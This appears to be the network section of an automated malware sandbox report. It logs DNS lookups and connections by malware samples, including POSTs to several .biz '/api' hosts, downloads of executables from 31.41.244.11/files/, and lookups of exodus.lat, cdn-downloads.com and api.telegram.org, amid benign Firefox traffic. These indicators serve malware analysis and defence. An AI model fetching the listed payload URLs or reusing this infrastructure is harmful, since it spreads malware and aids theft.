                                  HTTP Response

                                  200
                                • 172.67.136.167:443
                                  https://zinc-sneark.biz/api
                                  tls, http
                                  2M4078.exe
                                  999 B
                                  4.8kB
                                  9
                                  9

                                  HTTP Request

                                  POST https://zinc-sneark.biz/api

                                  HTTP Response

                                  200
                                • 172.67.153.96:443
                                  https://dwell-exclaim.biz/api
                                  tls, http
                                  2M4078.exe
                                  1.0kB
                                  4.8kB
                                  9
                                  9

                                  HTTP Request

                                  POST https://dwell-exclaim.biz/api

                                  HTTP Response

                                  200
                                • 31.41.244.11:80
                                  http://31.41.244.11/files/unique2/random.exe
                                  http
                                  skotes.exe
                                  455.0kB
                                  15.2MB
                                  9708
                                  15588

                                  HTTP Request

                                  GET http://31.41.244.11/files/7427009775/BhD8htX.exe

                                  HTTP Response

                                  200

                                  HTTP Request

                                  GET http://31.41.244.11/files/151334531/i1A5m12.exe

                                  HTTP Response

                                  200

                                  HTTP Request

                                  GET http://31.41.244.11/files/1818813749/wL3EGdM.exe

                                  HTTP Response

                                  200

                                  HTTP Request

                                  GET http://31.41.244.11/files/unique2/random.exe

                                  HTTP Response

                                  200
                                • 172.67.173.74:443
                                  https://formy-spill.biz/api
                                  tls, http
                                  2M4078.exe
                                  999 B
                                  4.8kB
                                  9
                                  9

                                  HTTP Request

                                  POST https://formy-spill.biz/api

                                  HTTP Response

                                  dns
                                  73 B
                                  144 B
                                  1
                                  1

                                  DNS Request

                                  95.221.229.192.in-addr.arpa

                                • 8.8.8.8:53
                                  atten-supporse.biz
                                  dns
                                  f56e441c8f.exe
                                  64 B
                                  96 B
                                  1
                                  1

                                  DNS Request

                                  atten-supporse.biz

                                  DNS Response

                                  172.67.165.166
                                  104.21.16.9

                                • 8.8.8.8:53
                                  166.165.67.172.in-addr.arpa
                                  dns
                                  73 B
                                  135 B
                                  1
                                  1

                                  DNS Request

                                  166.165.67.172.in-addr.arpa

                                • 8.8.8.8:53
                                  se-blurry.biz
                                  dns
                                  f56e441c8f.exe
                                  59 B
                                  91 B
                                  1
                                  1

                                  DNS Request

                                  se-blurry.biz

                                  DNS Response

                                  104.21.81.153
                                  172.67.162.65

                                • 8.8.8.8:53
                                  zinc-sneark.biz
                                  dns
                                  f56e441c8f.exe
                                  61 B
                                  93 B
                                  1
                                  1

                                  DNS Request

                                  zinc-sneark.biz

                                  DNS Response

                                  172.67.136.167
                                  104.21.62.142

                                • 8.8.8.8:53
                                  153.81.21.104.in-addr.arpa
                                  dns
                                  72 B
                                  134 B
                                  1
                                  1

                                  DNS Request

                                  153.81.21.104.in-addr.arpa

                                • 8.8.8.8:53
                                  104.219.191.52.in-addr.arpa
                                  dns
                                  73 B
                                  147 B
                                  1
                                  1

                                  DNS Request

                                  104.219.191.52.in-addr.arpa

                                • 8.8.8.8:53
                                  43.113.215.185.in-addr.arpa
                                  dns
                                  73 B
                                  133 B
                                  1
                                  1

                                  DNS Request

                                  43.113.215.185.in-addr.arpa

                                • 8.8.8.8:53
                                  dwell-exclaim.biz
                                  dns
                                  f56e441c8f.exe
                                  63 B
                                  95 B
                                  1
                                  1

                                  DNS Request

                                  dwell-exclaim.biz

                                  DNS Response

                                  172.67.153.96
                                  104.21.88.210

                                • 8.8.8.8:53
                                  167.136.67.172.in-addr.arpa
                                  dns
                                  73 B
                                  135 B
                                  1
                                  1

                                  DNS Request

                                  167.136.67.172.in-addr.arpa

                                • 8.8.8.8:53
                                  96.153.67.172.in-addr.arpa
                                  dns
                                  72 B
                                  134 B
                                  1
                                  1

                                  DNS Request

                                  96.153.67.172.in-addr.arpa

                                • 8.8.8.8:53
                                  11.244.41.31.in-addr.arpa
                                  dns
                                  71 B
                                  131 B
                                  1
                                  1

                                  DNS Request

                                  11.244.41.31.in-addr.arpa

                                • 8.8.8.8:53
                                  formy-spill.biz
                                  dns
                                  f56e441c8f.exe
                                  61 B
                                  93 B
                                  1
                                  1

                                  DNS Request

                                  formy-spill.biz

                                  DNS Response

                                  172.67.173.74
                                  104.21.96.55

                                • 8.8.8.8:53
                                  74.173.67.172.in-addr.arpa
                                  dns
                                  72 B
                                  134 B
                                  1
                                  1

                                  DNS Request

                                  74.173.67.172.in-addr.arpa

                                • 8.8.8.8:53
                                  ratiomun.cyou
                                  dns
                                  BhD8htX.exe
                                  59 B
                                  124 B
                                  1
                                  1

                                  DNS Request

                                  ratiomun.cyou

                                • 8.8.8.8:53
                                  covery-mover.biz
                                  dns
                                  f56e441c8f.exe
                                  62 B
                                  94 B
                                  1
                                  1

                                  DNS Request

                                  covery-mover.biz

                                  DNS Response

                                  172.67.206.64
                                  104.21.58.186

                                • 8.8.8.8:53
                                  dare-curbys.biz
                                  dns
                                  f56e441c8f.exe
                                  61 B
                                  93 B
                                  1
                                  1

                                  DNS Request

                                  dare-curbys.biz

                                  DNS Response

                                  104.21.43.156
                                  172.67.181.44

                                • 8.8.8.8:53
                                  64.206.67.172.in-addr.arpa
                                  dns
                                  72 B
                                  134 B
                                  1
                                  1

                                  DNS Request

                                  64.206.67.172.in-addr.arpa

                                • 8.8.8.8:53
                                  156.43.21.104.in-addr.arpa
                                  dns
                                  72 B
                                  134 B
                                  1
                                  1

                                  DNS Request

                                  156.43.21.104.in-addr.arpa

                                • 8.8.8.8:53
                                  print-vexer.biz
                                  dns
                                  f56e441c8f.exe
                                  61 B
                                  93 B
                                  1
                                  1

                                  DNS Request

                                  print-vexer.biz

                                  DNS Response

                                  104.21.35.246
                                  172.67.181.192

                                • 8.8.8.8:53
                                  246.35.21.104.in-addr.arpa
                                  dns
                                  72 B
                                  134 B
                                  1
                                  1

                                  DNS Request

                                  246.35.21.104.in-addr.arpa

                                • 8.8.8.8:53
                                  impend-differ.biz
                                  dns
                                  f56e441c8f.exe
                                  63 B
                                  125 B
                                  1
                                  1

                                  DNS Request

                                  impend-differ.biz

                                • 8.8.8.8:53
                                  steamcommunity.com
                                  dns
                                  f56e441c8f.exe
                                  64 B
                                  80 B
                                  1
                                  1

                                  DNS Request

                                  steamcommunity.com

                                  DNS Response

                                  23.214.143.155

                                • 8.8.8.8:53
                                  marshal-zhukov.com
                                  dns
                                  f56e441c8f.exe
                                  64 B
                                  96 B
                                  1
                                  1

                                  DNS Request

                                  marshal-zhukov.com

                                  DNS Response

                                  172.67.160.80
                                  104.21.82.174

                                • 8.8.8.8:53
                                  155.143.214.23.in-addr.arpa
                                  dns
                                  73 B
                                  139 B
                                  1
                                  1

                                  DNS Request

                                  155.143.214.23.in-addr.arpa

                                • 8.8.8.8:53
                                  80.160.67.172.in-addr.arpa
                                  dns
                                  72 B
                                  134 B
                                  1
                                  1

                                  DNS Request

                                  80.160.67.172.in-addr.arpa

                                • 8.8.8.8:53
                                  228.249.119.40.in-addr.arpa
                                  dns
                                  73 B
                                  159 B
                                  1
                                  1

                                  DNS Request

                                  228.249.119.40.in-addr.arpa

                                • 8.8.8.8:53
                                  206.113.215.185.in-addr.arpa
                                  dns
                                  74 B
                                  134 B
                                  1
                                  1

                                  DNS Request

                                  206.113.215.185.in-addr.arpa

                                • 8.8.8.8:53
                                  16.113.215.185.in-addr.arpa
                                  dns
                                  73 B
                                  133 B
                                  1
                                  1

                                  DNS Request

                                  16.113.215.185.in-addr.arpa

                                • 8.8.8.8:53
                                  UWPunrsopYzTstryocRtyY.UWPunrsopYzTstryocRtyY
                                  dns
                                  Dr.com
                                  273 B
                                  166 B
                                  3
                                  1

                                  DNS Request

                                  UWPunrsopYzTstryocRtyY.UWPunrsopYzTstryocRtyY

                                  DNS Request

                                  UWPunrsopYzTstryocRtyY.UWPunrsopYzTstryocRtyY

                                  DNS Request

                                  UWPunrsopYzTstryocRtyY.UWPunrsopYzTstryocRtyY

                                • 8.8.8.8:53
                                  197.87.175.4.in-addr.arpa
                                  dns
                                  71 B
                                  157 B
                                  1
                                  1

                                  DNS Request

                                  197.87.175.4.in-addr.arpa

                                • 8.8.8.8:53
                                  18.31.95.13.in-addr.arpa
                                  dns
                                  70 B
                                  144 B
                                  1
                                  1

                                  DNS Request

                                  18.31.95.13.in-addr.arpa

                                • 8.8.8.8:53
                                  92.12.20.2.in-addr.arpa
                                  dns
                                  69 B
                                  131 B
                                  1
                                  1

                                  DNS Request

                                  92.12.20.2.in-addr.arpa

                                • 8.8.8.8:53
                                  impend-differ.biz
                                  dns
                                  f56e441c8f.exe
                                  63 B
                                  125 B
                                  1
                                  1

                                  DNS Request

                                  impend-differ.biz

                                • 8.8.8.8:53
                                  steamcommunity.com
                                  dns
                                  f56e441c8f.exe
                                  64 B
                                  80 B
                                  1
                                  1

                                  DNS Request

                                  steamcommunity.com

                                  DNS Response

                                  23.214.143.155

                                • 8.8.8.8:53
                                  youtube.com
                                  dns
                                  firefox.exe
                                  57 B
                                  73 B
                                  1
                                  1

                                  DNS Request

                                  youtube.com

                                  DNS Response

                                  216.58.213.14

                                • 8.8.8.8:53
                                  spocs.getpocket.com
                                  dns
                                  firefox.exe
                                  130 B
                                  262 B
                                  2
                                  2

                                  DNS Request

                                  spocs.getpocket.com

                                  DNS Response

                                  34.117.188.166

                                  DNS Request

                                  spocs.getpocket.com

                                  DNS Response

                                  34.117.188.166

                                • 8.8.8.8:53
                                  firefox-api-proxy.cdn.mozilla.net
                                  dns
                                  firefox.exe
                                  79 B
                                  160 B
                                  1
                                  1

                                  DNS Request

                                  firefox-api-proxy.cdn.mozilla.net

                                  DNS Response

                                  34.149.97.1

                                • 8.8.8.8:53
                                  youtube.com
                                  dns
                                  firefox.exe
                                  57 B
                                  73 B
                                  1
                                  1

                                  DNS Request

                                  youtube.com

                                  DNS Response

                                  216.58.213.14

                                • 8.8.8.8:53
                                  youtube.com
                                  dns
                                  firefox.exe
                                  114 B
                                  170 B
                                  2
                                  2

                                  DNS Request

                                  youtube.com

                                  DNS Response

                                  2a00:1450:4009:816::200e

                                  DNS Request

                                  youtube.com

                                  DNS Response

                                  2a00:1450:4009:816::200e

                                • 8.8.8.8:53
                                  firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                                  dns
                                  firefox.exe
                                  200 B
                                  232 B
                                  2
                                  2

                                  DNS Request

                                  firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

                                  DNS Response

                                  34.149.97.1

                                  DNS Request

                                  firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

                                  DNS Response

                                  34.149.97.1

                                • 8.8.8.8:53
                                  prod.ads.prod.webservices.mozgcp.net
                                  dns
                                  firefox.exe
                                  164 B
                                  196 B
                                  2
                                  2

                                  DNS Request

                                  prod.ads.prod.webservices.mozgcp.net

                                  DNS Response

                                  34.117.188.166

                                  DNS Request

                                  prod.ads.prod.webservices.mozgcp.net

                                  DNS Response

                                  34.117.188.166

                                • 8.8.8.8:53
                                  172.210.232.199.in-addr.arpa
                                  dns
                                  148 B
                                  256 B
                                  2
                                  2

                                  DNS Request

                                  172.210.232.199.in-addr.arpa

                                  DNS Request

                                  172.210.232.199.in-addr.arpa

                                • 8.8.8.8:53
                                  prod.content-signature-chains.prod.webservices.mozgcp.net
                                  dns
                                  firefox.exe
                                  206 B
                                  238 B
                                  2
                                  2

                                  DNS Request

                                  prod.content-signature-chains.prod.webservices.mozgcp.net

                                  DNS Response

                                  34.160.144.191

                                  DNS Request

                                  prod.content-signature-chains.prod.webservices.mozgcp.net

                                  DNS Response

                                  34.160.144.191

                                • 8.8.8.8:53
                                  firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                                  dns
                                  firefox.exe
                                  100 B
                                  128 B
                                  1
                                  1

                                  DNS Request

                                  firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

                                  DNS Response

                                  2600:1901:0:74e4::

                                • 8.8.8.8:53
                                  prod.ads.prod.webservices.mozgcp.net
                                  dns
                                  firefox.exe
                                  82 B
                                  175 B
                                  1
                                  1

                                  DNS Request

                                  prod.ads.prod.webservices.mozgcp.net

                                • 8.8.8.8:53
                                  shavar.prod.mozaws.net
                                  dns
                                  firefox.exe
                                  68 B
                                  116 B
                                  1
                                  1

                                  DNS Request

                                  shavar.prod.mozaws.net

                                  DNS Response

                                  52.32.237.164
                                  44.226.106.83
                                  52.33.23.190

                                • 8.8.8.8:53
                                  prod.content-signature-chains.prod.webservices.mozgcp.net
                                  dns
                                  firefox.exe
                                  206 B
                                  262 B
                                  2
                                  2

                                  DNS Request

                                  prod.content-signature-chains.prod.webservices.mozgcp.net

                                  DNS Response

                                  2600:1901:0:92a9::

                                  DNS Request

                                  prod.content-signature-chains.prod.webservices.mozgcp.net

                                  DNS Response

                                  2600:1901:0:92a9::

                                • 8.8.8.8:53
                                  shavar.prod.mozaws.net
                                  dns
                                  firefox.exe
                                  68 B
                                  153 B
                                  1
                                  1

                                  DNS Request

                                  shavar.prod.mozaws.net

                                • 216.58.213.14:443
                                  youtube.com
                                  https
                                  firefox.exe
                                  1.8kB
                                  9.3kB
                                  6
                                  10
                                • 34.149.97.1:443
                                  firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                                  https
                                  firefox.exe
                                  1.8kB
                                  4.4kB
                                  6
                                  6
                                • 8.8.8.8:53
                                  www.youtube.com
                                  dns
                                  firefox.exe
                                  122 B
                                  574 B
                                  2
                                  2

                                  DNS Request

                                  www.youtube.com

                                  DNS Response

                                  142.250.187.206
                                  142.250.200.46
                                  142.250.179.238
                                  142.250.180.14
                                  172.217.169.46
                                  172.217.169.78
                                  172.217.16.238
                                  216.58.201.110
                                  142.250.187.238
                                  142.250.200.14
                                  216.58.204.78
                                  142.250.178.14

                                  DNS Request

                                  www.youtube.com

                                  DNS Response

                                  172.217.16.238
                                  142.250.180.14
                                  172.217.169.78
                                  142.250.178.14
                                  142.250.200.46
                                  172.217.169.46
                                  142.250.187.206
                                  142.250.179.238
                                  142.250.187.238
                                  142.250.200.14
                                  216.58.204.78
                                  216.58.201.110

                                • 8.8.8.8:53
                                  prod.remote-settings.prod.webservices.mozgcp.net
                                  dns
                                  firefox.exe
                                  188 B
                                  220 B
                                  2
                                  2

                                  DNS Request

                                  prod.remote-settings.prod.webservices.mozgcp.net

                                  DNS Response

                                  34.149.100.209

                                  DNS Request

                                  prod.remote-settings.prod.webservices.mozgcp.net

                                  DNS Response

                                  34.149.100.209

                                • 8.8.8.8:53
                                  youtube-ui.l.google.com
                                  dns
                                  firefox.exe
                                  138 B
                                  522 B
                                  2
                                  2

                                  DNS Request

                                  youtube-ui.l.google.com

                                  DNS Response

                                  172.217.16.238
                                  142.250.178.14
                                  172.217.169.46
                                  142.250.200.46
                                  142.250.187.238
                                  142.250.200.14
                                  142.250.187.206
                                  142.250.179.238
                                  142.250.180.14
                                  172.217.169.78
                                  216.58.204.78
                                  216.58.201.110

                                  DNS Request

                                  youtube-ui.l.google.com

                                  DNS Response

                                  142.250.180.14
                                  216.58.201.110
                                  142.250.178.14
                                  142.250.187.238
                                  216.58.204.78
                                  142.250.200.46
                                  172.217.16.238
                                  142.250.200.14
                                  142.250.187.206
                                  142.250.179.238
                                  172.217.169.78
                                  172.217.169.46

                                • 8.8.8.8:53
                                  prod.remote-settings.prod.webservices.mozgcp.net
                                  dns
                                  firefox.exe
                                  94 B
                                  187 B
                                  1
                                  1

                                  DNS Request

                                  prod.remote-settings.prod.webservices.mozgcp.net

                                • 8.8.8.8:53
                                  youtube-ui.l.google.com
                                  dns
                                  firefox.exe
                                  138 B
                                  362 B
                                  2
                                  2

                                  DNS Request

                                  youtube-ui.l.google.com

                                  DNS Response

                                  2a00:1450:4009:815::200e
                                  2a00:1450:4009:823::200e
                                  2a00:1450:4009:821::200e
                                  2a00:1450:4009:822::200e

                                  DNS Request

                                  youtube-ui.l.google.com

                                  DNS Response

                                  2a00:1450:4009:821::200e
                                  2a00:1450:4009:823::200e
                                  2a00:1450:4009:822::200e
                                  2a00:1450:4009:815::200e

                                • 142.250.187.206:443
                                  youtube-ui.l.google.com
                                  https
                                  firefox.exe
                                  2.8kB
                                  10.5kB
                                  11
                                  14
                                • 8.8.8.8:53
                                  consent.youtube.com
                                  dns
                                  firefox.exe
                                  130 B
                                  162 B
                                  2
                                  2

                                  DNS Request

                                  consent.youtube.com

                                  DNS Response

                                  142.250.200.14

                                  DNS Request

                                  consent.youtube.com

                                  DNS Response

                                  142.250.200.14

                                • 8.8.8.8:53
                                  14.213.58.216.in-addr.arpa
                                  dns
                                  72 B
                                  141 B
                                  1
                                  1

                                  DNS Request

                                  14.213.58.216.in-addr.arpa

                                • 8.8.8.8:53
                                  firefox-settings-attachments.cdn.mozilla.net
                                  dns
                                  firefox.exe
                                  90 B
                                  177 B
                                  1
                                  1

                                  DNS Request

                                  firefox-settings-attachments.cdn.mozilla.net

                                  DNS Response

                                  34.117.121.53

                                • 8.8.8.8:53
                                  164.237.32.52.in-addr.arpa
                                  dns
                                  72 B
                                  135 B
                                  1
                                  1

                                  DNS Request

                                  164.237.32.52.in-addr.arpa

                                • 8.8.8.8:53
                                  206.187.250.142.in-addr.arpa
                                  dns
                                  74 B
                                  113 B
                                  1
                                  1

                                  DNS Request

                                  206.187.250.142.in-addr.arpa

                                • 8.8.8.8:53
                                  consent.youtube.com
                                  dns
                                  firefox.exe
                                  65 B
                                  81 B
                                  1
                                  1

                                  DNS Request

                                  consent.youtube.com

                                  DNS Response

                                  142.250.200.14

                                • 8.8.8.8:53
                                  consent.youtube.com
                                  dns
                                  firefox.exe
                                  65 B
                                  93 B
                                  1
                                  1

                                  DNS Request

                                  consent.youtube.com

                                  DNS Response

                                  2a00:1450:4009:822::200e

                                • 142.250.200.14:443
                                  consent.youtube.com
                                  https
                                  firefox.exe
                                  2.2kB
                                  9.4kB
                                  10
                                  11
                                • 8.8.8.8:53
                                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                                  dns
                                  firefox.exe
                                  212 B
                                  244 B
                                  2
                                  2

                                  DNS Request

                                  attachments.prod.remote-settings.prod.webservices.mozgcp.net

                                  DNS Response

                                  34.117.121.53

                                  DNS Request

                                  attachments.prod.remote-settings.prod.webservices.mozgcp.net

                                  DNS Response

                                  34.117.121.53

                                • 8.8.8.8:53
                                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                                  dns
                                  firefox.exe
                                  212 B
                                  398 B
                                  2
                                  2

                                  DNS Request

                                  attachments.prod.remote-settings.prod.webservices.mozgcp.net

                                  DNS Request

                                  attachments.prod.remote-settings.prod.webservices.mozgcp.net

                                • 8.8.8.8:53
                                  14.200.250.142.in-addr.arpa
                                  dns
                                  146 B
                                  224 B
                                  2
                                  2

                                  DNS Request

                                  14.200.250.142.in-addr.arpa

                                  DNS Request

                                  14.200.250.142.in-addr.arpa

                                • 8.8.8.8:53
                                  227.187.250.142.in-addr.arpa
                                  dns
                                  148 B
                                  224 B
                                  2
                                  2

                                  DNS Request

                                  227.187.250.142.in-addr.arpa

                                  DNS Request

                                  227.187.250.142.in-addr.arpa

                                • 8.8.8.8:53
                                  74.204.58.216.in-addr.arpa
                                  dns
                                  144 B
                                  342 B
                                  2
                                  2

                                  DNS Request

                                  74.204.58.216.in-addr.arpa

                                  DNS Request

                                  74.204.58.216.in-addr.arpa

                                • 8.8.8.8:53
                                  www.google.com
                                  dns
                                  firefox.exe
                                  60 B
                                  76 B
                                  1
                                  1

                                  DNS Request

                                  www.google.com

                                  DNS Response

                                  142.250.187.196

                                • 8.8.8.8:53
                                  www.google.com
                                  dns
                                  firefox.exe
                                  120 B
                                  152 B
                                  2
                                  2

                                  DNS Request

                                  www.google.com

                                  DNS Response

                                  142.250.187.196

                                  DNS Request

                                  www.google.com

                                  DNS Response

                                  142.250.187.196

                                • 8.8.8.8:53
                                  www.google.com
                                  dns
                                  firefox.exe
                                  60 B
                                  88 B
                                  1
                                  1

                                  DNS Request

                                  www.google.com

                                  DNS Response

                                  2a00:1450:4009:81f::2004

                                • 142.250.187.196:443
                                  www.google.com
                                  https
                                  firefox.exe
                                  2.0kB
                                  9.3kB
                                  8
                                  10
                                • 8.8.8.8:53
                                  195.187.250.142.in-addr.arpa
                                  dns
                                  148 B
                                  224 B
                                  2
                                  2

                                  DNS Request

                                  195.187.250.142.in-addr.arpa

                                  DNS Request

                                  195.187.250.142.in-addr.arpa

                                • 8.8.8.8:53
                                  196.187.250.142.in-addr.arpa
                                  dns
                                  148 B
                                  224 B
                                  2
                                  2

                                  DNS Request

                                  196.187.250.142.in-addr.arpa

                                  DNS Request

                                  196.187.250.142.in-addr.arpa

                                • 8.8.8.8:53
                                  211.38.74.45.in-addr.arpa
                                  dns
                                  71 B
                                  136 B
                                  1
                                  1

                                  DNS Request

                                  211.38.74.45.in-addr.arpa

                                • 8.8.8.8:53
                                  221.197.63.92.in-addr.arpa
                                  dns
                                  72 B
                                  132 B
                                  1
                                  1

                                  DNS Request

                                  221.197.63.92.in-addr.arpa

                                • 8.8.8.8:53
                                  exodus.lat
                                  dns
                                  curl.exe
                                  112 B
                                  144 B
                                  2
                                  2

                                  DNS Request

                                  exodus.lat

                                  DNS Request

                                  exodus.lat

                                  DNS Response

                                  203.161.45.11

                                  DNS Response

                                  203.161.45.11

                                • 8.8.8.8:53
                                  11.45.161.203.in-addr.arpa
                                  dns
                                  144 B
                                  238 B
                                  2
                                  2

                                  DNS Request

                                  11.45.161.203.in-addr.arpa

                                  DNS Request

                                  11.45.161.203.in-addr.arpa

                                • 8.8.8.8:53
                                  api.ipify.org
                                  dns
                                  curl.exe
                                  59 B
                                  107 B
                                  1
                                  1

                                  DNS Request

                                  api.ipify.org

                                  DNS Response

                                  172.67.74.152
                                  104.26.13.205
                                  104.26.12.205

                                • 8.8.8.8:53
                                  c.pki.goog
                                  dns
                                  56 B
                                  107 B
                                  1
                                  1

                                  DNS Request

                                  c.pki.goog

                                  DNS Response

                                  142.250.200.35

                                • 8.8.8.8:53
                                  152.74.67.172.in-addr.arpa
                                  dns
                                  72 B
                                  134 B
                                  1
                                  1

                                  DNS Request

                                  152.74.67.172.in-addr.arpa

                                • 8.8.8.8:53
                                  cdn-downloads.com
                                  dns
                                  COMSurrogate.exe
                                  63 B
                                  79 B
                                  1
                                  1

                                  DNS Request

                                  cdn-downloads.com

                                  DNS Response

                                  203.161.45.11

                                • 8.8.8.8:53
                                  r11.o.lencr.org
                                  dns
                                  61 B
                                  160 B
                                  1
                                  1

                                  DNS Request

                                  r11.o.lencr.org

                                  DNS Response

                                  88.221.135.106
                                  88.221.135.113

                                • 8.8.8.8:53
                                  168.245.100.95.in-addr.arpa
                                  dns
                                  73 B
                                  139 B
                                  1
                                  1

                                  DNS Request

                                  168.245.100.95.in-addr.arpa

                                • 8.8.8.8:53
                                  106.135.221.88.in-addr.arpa
                                  dns
                                  73 B
                                  139 B
                                  1
                                  1

                                  DNS Request

                                  106.135.221.88.in-addr.arpa

                                • 8.8.8.8:53
                                  location.services.mozilla.com
                                  dns
                                  firefox.exe
                                  75 B
                                  153 B
                                  1
                                  1

                                  DNS Request

                                  location.services.mozilla.com

                                  DNS Response

                                  35.190.72.216

                                • 8.8.8.8:53
                                  prod.balrog.prod.cloudops.mozgcp.net
                                  dns
                                  firefox.exe
                                  164 B
                                  196 B
                                  2
                                  2

                                  DNS Request

                                  prod.balrog.prod.cloudops.mozgcp.net

                                  DNS Request

                                  prod.balrog.prod.cloudops.mozgcp.net

                                  DNS Response

                                  35.244.181.201

                                  DNS Response

                                  35.244.181.201

                                • 8.8.8.8:53
                                  prod.classify-client.prod.webservices.mozgcp.net
                                  dns
                                  firefox.exe
                                  94 B
                                  110 B
                                  1
                                  1

                                  DNS Request

                                  prod.classify-client.prod.webservices.mozgcp.net

                                  DNS Response

                                  35.190.72.216

                                • 8.8.8.8:53
                                  prod.balrog.prod.cloudops.mozgcp.net
                                  dns
                                  firefox.exe
                                  82 B
                                  175 B
                                  1
                                  1

                                  DNS Request

                                  prod.balrog.prod.cloudops.mozgcp.net

                                • 8.8.8.8:53
                                  201.181.244.35.in-addr.arpa
                                  dns
                                  73 B
                                  126 B
                                  1
                                  1

                                  DNS Request

                                  201.181.244.35.in-addr.arpa

                                • 8.8.8.8:53
                                  prod.classify-client.prod.webservices.mozgcp.net
                                  dns
                                  firefox.exe
                                  94 B
                                  187 B
                                  1
                                  1

                                  DNS Request

                                  prod.classify-client.prod.webservices.mozgcp.net

                                • 35.190.72.216:443
                                  prod.classify-client.prod.webservices.mozgcp.net
                                  https
                                  firefox.exe
                                  1.8kB
                                  4.3kB
                                  6
                                  6
                                • 8.8.8.8:53
                                  ciscobinary.openh264.org
                                  dns
                                  firefox.exe
                                  140 B
                                  572 B
                                  2
                                  2

                                  DNS Request

                                  ciscobinary.openh264.org

                                  DNS Request

                                  ciscobinary.openh264.org

                                  DNS Response

                                  88.221.134.209
                                  88.221.134.155

                                  DNS Response

                                  88.221.134.209
                                  88.221.134.155

                                • 8.8.8.8:53
                                  redirector.gvt1.com
                                  dns
                                  firefox.exe
                                  65 B
                                  81 B
                                  1
                                  1

                                  DNS Request

                                  redirector.gvt1.com

                                  DNS Response

                                  142.250.187.206

                                • 8.8.8.8:53
                                  redirector.gvt1.com
                                  dns
                                  firefox.exe
                                  130 B
                                  162 B
                                  2
                                  2

                                  DNS Request

                                  redirector.gvt1.com

                                  DNS Request

                                  redirector.gvt1.com

                                  DNS Response

                                  142.250.187.206

                                  DNS Response

                                  142.250.187.206

                                • 8.8.8.8:53
                                  a19.dscg10.akamai.net
                                  dns
                                  firefox.exe
                                  134 B
                                  198 B
                                  2
                                  2

                                  DNS Request

                                  a19.dscg10.akamai.net

                                  DNS Request

                                  a19.dscg10.akamai.net

                                  DNS Response

                                  88.221.134.209
                                  88.221.134.155

                                  DNS Response

                                  88.221.134.209
                                  88.221.134.155

                                • 8.8.8.8:53
                                  a19.dscg10.akamai.net
                                  dns
                                  firefox.exe
                                  67 B
                                  123 B
                                  1
                                  1

                                  DNS Request

                                  a19.dscg10.akamai.net

                                  DNS Response

                                  2a02:26f0:a1::58dd:869b
                                  2a02:26f0:a1::58dd:86d1

                                • 8.8.8.8:53
                                  redirector.gvt1.com
                                  dns
                                  firefox.exe
                                  65 B
                                  93 B
                                  1
                                  1

                                  DNS Request

                                  redirector.gvt1.com

                                  DNS Response

                                  2a00:1450:4009:81f::200e

                                • 142.250.187.206:443
                                  redirector.gvt1.com
                                  https
                                  firefox.exe
                                  1.9kB
                                  9.3kB
                                  8
                                  10
                                • 8.8.8.8:53
                                  r4---sn-aigzrnsz.gvt1.com
                                  dns
                                  firefox.exe
                                  71 B
                                  116 B
                                  1
                                  1

                                  DNS Request

                                  r4---sn-aigzrnsz.gvt1.com

                                  DNS Response

                                  74.125.175.169

                                • 8.8.8.8:53
                                  r4.sn-aigzrnsz.gvt1.com
                                  dns
                                  firefox.exe
                                  69 B
                                  85 B
                                  1
                                  1

                                  DNS Request

                                  r4.sn-aigzrnsz.gvt1.com

                                  DNS Response

                                  74.125.175.169

                                • 8.8.8.8:53
                                  r4.sn-aigzrnsz.gvt1.com
                                  dns
                                  firefox.exe
                                  138 B
                                  194 B
                                  2
                                  2

                                  DNS Request

                                  r4.sn-aigzrnsz.gvt1.com

                                  DNS Response

                                  2a00:1450:4009:1b::9

                                  DNS Request

                                  r4.sn-aigzrnsz.gvt1.com

                                  DNS Response

                                  2a00:1450:4009:1b::9

                                • 8.8.8.8:53
                                  216.72.190.35.in-addr.arpa
                                  dns
                                  72 B
                                  124 B
                                  1
                                  1

                                  DNS Request

                                  216.72.190.35.in-addr.arpa

                                • 8.8.8.8:53
                                  31.243.111.52.in-addr.arpa
                                  dns
                                  72 B
                                  158 B
                                  1
                                  1

                                  DNS Request

                                  31.243.111.52.in-addr.arpa

                                • 8.8.8.8:53
                                  209.134.221.88.in-addr.arpa
                                  dns
                                  73 B
                                  139 B
                                  1
                                  1

                                  DNS Request

                                  209.134.221.88.in-addr.arpa

                                • 8.8.8.8:53
                                  169.175.125.74.in-addr.arpa
                                  dns
                                  73 B
                                  111 B
                                  1
                                  1

                                  DNS Request

                                  169.175.125.74.in-addr.arpa

                                • 74.125.175.169:443
                                  r4.sn-aigzrnsz.gvt1.com
                                  https
                                  firefox.exe
                                  1.8kB
                                  5.9kB
                                  6
                                  7
• 8.8.8.8:53  play.google.com  dns  firefox.exe  sent 61 B (1 pkt), no response recorded
  DNS Request: play.google.com

• 8.8.8.8:53  play.google.com  dns  firefox.exe  sent 61 B (1 pkt), received 77 B (1 pkt)
  DNS Request: play.google.com
  DNS Response: 142.250.179.238

• 8.8.8.8:53  play.google.com  dns  firefox.exe  sent 122 B (2 pkts), received 178 B (2 pkts)
  DNS Request: play.google.com
  DNS Response: 2a00:1450:4009:81d::200e
  DNS Request: play.google.com
  DNS Response: 2a00:1450:4009:81d::200e

• 142.250.179.238:443  play.google.com  https  firefox.exe  sent 2.2kB (9 pkts), received 9.4kB (11 pkts)

• 8.8.8.8:53  238.179.250.142.in-addr.arpa  dns  (no process listed)  sent 74 B (1 pkt), received 113 B (1 pkt)
  DNS Request: 238.179.250.142.in-addr.arpa

• 8.8.8.8:53  prod.balrog.prod.cloudops.mozgcp.net  dns  firefox.exe  sent 82 B (1 pkt), received 175 B (1 pkt)
  DNS Request: prod.balrog.prod.cloudops.mozgcp.net

• 8.8.8.8:53  prod.remote-settings.prod.webservices.mozgcp.net  dns  firefox.exe  sent 94 B (1 pkt), received 110 B (1 pkt)
  DNS Request: prod.remote-settings.prod.webservices.mozgcp.net
  DNS Response: 34.149.100.209

• 8.8.8.8:53  prod.remote-settings.prod.webservices.mozgcp.net  dns  firefox.exe  sent 94 B (1 pkt), received 187 B (1 pkt)
  DNS Request: prod.remote-settings.prod.webservices.mozgcp.net

• 8.8.8.8:53  api.telegram.org  dns  COMSurrogate.exe  sent 62 B (1 pkt), received 78 B (1 pkt)
